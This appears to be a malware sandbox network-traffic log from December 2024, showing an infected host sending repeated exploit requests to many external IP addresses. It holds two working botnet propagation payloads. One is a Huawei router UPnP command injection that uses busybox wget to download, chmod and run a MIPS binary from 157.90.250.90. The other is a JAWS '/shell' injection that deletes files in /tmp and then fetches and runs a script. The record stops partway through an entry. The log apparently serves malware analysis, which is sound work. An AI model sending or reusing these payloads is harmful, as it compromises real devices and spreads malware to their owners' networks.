                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          113192.168.2.2333370168.200.219.6480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.463613987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          114192.168.2.2339544209.58.154.180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.464277029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          115192.168.2.2341066107.228.249.1780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.464925051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          116192.168.2.233548487.101.119.20680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.465604067 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          117192.168.2.2347686166.27.48.14680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.466816902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          118192.168.2.235118481.193.189.21780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.467509031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          119192.168.2.235767474.248.70.5380
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.468108892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          120192.168.2.2346738110.74.199.9780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.468713045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          121192.168.2.235983236.177.131.9080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.469358921 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          122192.168.2.2336520206.218.156.5880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.469963074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          123192.168.2.2360984207.44.6.2880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.470571041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          124192.168.2.2341480197.142.95.10437215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.852309942 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          125192.168.2.2342006156.54.52.6437215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.853049994 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          126192.168.2.2350496197.48.57.20737215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.853584051 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          127192.168.2.2337080156.2.32.20537215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.854125977 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          128192.168.2.235306241.23.152.11237215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.854813099 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          129192.168.2.2335240197.81.114.15537215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.855416059 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          130192.168.2.2337732197.68.34.7437215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.856117964 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          131192.168.2.2339288197.28.236.19037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.856683016 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          132192.168.2.234142841.118.107.11337215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.857268095 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
